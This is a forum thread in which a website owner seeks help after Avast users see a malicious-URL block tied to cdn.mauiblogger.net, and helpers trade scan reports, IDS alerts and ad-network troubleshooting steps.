Site flagged for malware (mauiblogger.net), help needed

A few users of my site (411mania.com) who use Avast have told me that they get a warning when trying to access the site. The warning message that comes up for a user of mine is:

“MALICIOUS URL BLOCKED”
avast! Network Shield has blocked a harmful site
Object: http.//cdn.mauiblogger.net/k
Infection: URL:Mal
Target Process: Firefox

As far as I know, no other blocker, nor Google, has marked the site for malware. Google is usually all over me anytime a malware issue comes up, and I have not heard anything from them about this (and this issue has been going on for days on Avast, so it’s not a new issue).

Any help on how I can fix this issue on avast would be appreciated. I feel like it’s a false positive because I cannot find anything about the mauiblogger.net domain, nobody else is marking the site as suspicious, and I can’t find anything unusual in my code. It might be something come through via the ads, but I use only well established ad companies like AdSense, Tribal Fusion, etc.

If anyone has any input on this, I’d appreciate it.

Thanks!

Also just to add a bit more info:

I downloaded Avast for Mac and do not get any warning when accessing the 411mania.com site. So it appears only PC users using Avast get the warning. I also removed all the ads from a test page and had one of the users who is getting the warning access it, and he still got the warning.

Any input would be appreciated. Thanks!

URL:mal is not infected but means that the url is on a black list

and this can be the reason why. (411mania.com). http://urlquery.net/report.php?id=4423784

Intrusion Detection Systems.
Suricata /w Emerging Threats Pro
2013-08-07 08:09:39 212.124.126.7 urlQuery Client 3 ET RBN Known Russian Business Network IP (162)

Wikipedia. Russian Business Network http://en.wikipedia.org/wiki/Russian_Business_Network

if you think this is wrong, report it here here: http://www.avast.com/contact-form.php
you may add a link to this topic in case they reply

Thanks for the reply Pondus. Any idea how I can solve the issue? All my ad companies are claiming that none of their advertisers have anything to do with that domain, and I can’t find anything else in my code that would cause something from that domain to load on my site. It’s really puzzling to me and I’m running out of ideas on how to solve the problem for Avast users.

Well, here: http://zulu.zscaler.com/submission/show/8c76b8eb17ddc36eeadee40e24fb67df-1375991351

zulu is not completing scan for 411 site, but downforeveryoneorjustme is reporting site as live.

See attached:

I’d check for nested redirects within your site as this block occurred two seconds after loading the webpage when visiting by using scanned links from zulu.

I get either the server did not accept my request, or an invalid URL was passed. The error code returned was:

Code: -2147012894
Description: The operation timed out
Server Response:
Description: unknown response code
Issue with malicious software includes 12 scripting exploit(s).
Recently MALWARE-OTHER TDS Sutra - redirect received IDS alert.
Malicious software is hosted on 1 domain(s), including luminate.com/.

This site was hosted on 1 network(s) including AS27357 (RACKSPACE).
Webrep OK: http://www.webutation.net/go/review/411mania.com
Clean here: http://sitecheck.sucuri.net/scanner/?scan=http%3A%2F%2F411mania.com#tab1

Quttera detects potential suspicious file:
tags.expo9.exponential.com/tags/411maniacom/ROS/tags.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code .

polonus

Going there with NoScript and RequestPolicy active in the browser, I now no longer get a avast shield alert,

polonus

Thanks again for your help. The code they are labeling as suspicious is the Tribal Fusion ad code. Tribal Fusion is one of the largest and most reputable ad companies in the country and I’ve been using them for 10+ years with no issues. Really strange. So you guys think the source of the issue is the ad code identified here?:

Quttera detects potential suspicious file:
tags.expo9.exponential.com/tags/411maniacom/ROS/tags.js
Severity: Potentially Suspicious
Reason: Suspicious JavaScript code injection.
Details: Procedure: + has been called with a string containing hidden JavaScript code .

That code is just their standard ad code.

I went into the Tribal Fusion ad system and blocked all ads from mauiblogger.net and mauiblogger.com. Do you guys still get a warning when visiting 411mania.com?

The issue is really weird because Norton and Google have no issues at all with that ad code or anything else on 411mania.com. As far as I know, only users using the PC version of Avast have the issue (Avast on Mac doesn’t give me any warnings).

Block still active when visiting 411. Exact same message as before, indicating source is mauiblogger.net/k

[EDIT:] Just because you’ve no problems with Tribal Fusion in the past does not mean that network cannot be hacked/infected in the future.

Thanks mchain. As a test, I’ve removed the Tribal Fusion (expo9) tags entirely from one page. Can you let me know if you still get a warning when visiting this page:

http://www.411mania.com/games

That will at least tell me if those tags are infact the issue or if it is something else.

Thanks,
Ashish

I am getting no Alert from Avast. ;D

Thanks Steven. Do you still get the alert on 411mania.com? If you get it on 411mania.com but don’t get it on 411mania.com/games, that would confirm the issue is with the ads.

Thanks,
Ashish

NoAlert on both sites. ;D

My users who use Avast continue to say that they get the warning. I tested pulling all the ads from the site and still got this issue from urlquery.net:

Intrusion Detection Systems
Suricata /w Emerging Threats Pro No alerts detected
Snort /w Sourcefire VRT
Timestamp Source IP Destination IP Severity Alert
2013-08-09 08:05:02 174.122.149.143 urlQuery Client 1 MALWARE-OTHER TDS Sutra - redirect received

http://urlquery.net/report.php?id=4458074

I’ve since put the ads back up since they aren’t the cause. One ad was causing the earlier warning involving the Russian Business Network IP but I removed that.

I’m at a real loss here. I tried contacting Avast directly but nobody replied.

Do you recognize the sites found here?: http://urlquery.net/domain_graph.php?id=4458074

~!Donovan

Yeah, most of those are ads, which I tried removing entirely but still got the error. You’ll notice in that chart that cdn.mauiblogger.net, which is what is setting off the issue, loads directly from 411mania.com, not one of the other URLs. I had Rackspace look into the issue and they couldn’t even find anything and said that it must be an issue with Avast since no other antivirus software or Google has any issues with anything on the site. I’m really confused/frustrated here.

What is this?

GET /k HTTP/1.1 
Host: cdn.mauiblogger.net

~!Donovan

Look for the alerts on that same IP and domain: http://urlquery.net/report.php?id=3804284
IDS for MALWARE-OTHER TDS Sutra - redirect received, ergo clickfraud

polonus

polonus, I clicked on the urlquery report you pulled for cdn.mauiblogger.net and it was totally clean with no malware warning. Makes zero sense that urlquery.com gives a malware warning for 411mania.com which they say is coming from 174.122.149.143 (cdn.mauiblogger.net) but that when I do a urlquery report for cdn.mauiblogger.net itself, it comes back totally clean.

Something isn’t right here.